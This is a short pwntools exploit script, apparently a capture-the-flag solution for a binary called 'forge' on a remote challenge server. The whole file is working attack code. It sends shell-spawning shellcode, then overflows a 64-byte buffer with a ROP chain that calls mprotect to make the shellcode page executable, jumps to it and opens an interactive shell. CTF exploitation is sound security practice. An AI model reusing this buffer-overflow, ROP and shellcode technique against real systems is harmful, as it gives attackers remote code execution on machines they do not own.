from pwn import *

context.binary = elf = ELF("./forge", checksec=False)
# p = process(elf.path)
p = remote("offsec.m0lecon.it", 13574)
OFF_INPUT = 64
ret = 0x000000000040101A
pop_rdi = 0x00000000004011FB
pop_rsi = 0x0000000000401204
pop_rdx = 0x000000000040120D
shellcode_addr = 0x0000000000404080
MPROTECT_PLT = elf.plt["mprotect"]
PROT = 0x7

print(p.recvuntil(b"[forge] Send shellcode:\n"))
shellcode = flat(asm(shellcraft.sh()))
SHELLCODE_SIZE = 200
p.send(shellcode)
# p.send(b"A")
# p.send(b"\n")
print(p.recvuntil(b"[forge] Input:\n"))
payload = flat(
    b"A" * OFF_INPUT,
    p64(ret),
    p64(pop_rdi),
    p64(shellcode_addr & 0xFFFFF000),  # Must be page aligned
    p64(pop_rsi),
    4096,
    p64(pop_rdx),
    p64(PROT),
    # p64(ret),
    p64(MPROTECT_PLT),
    p64(shellcode_addr),
)
p.send(payload)
# p.send(b"\n")
p.interactive()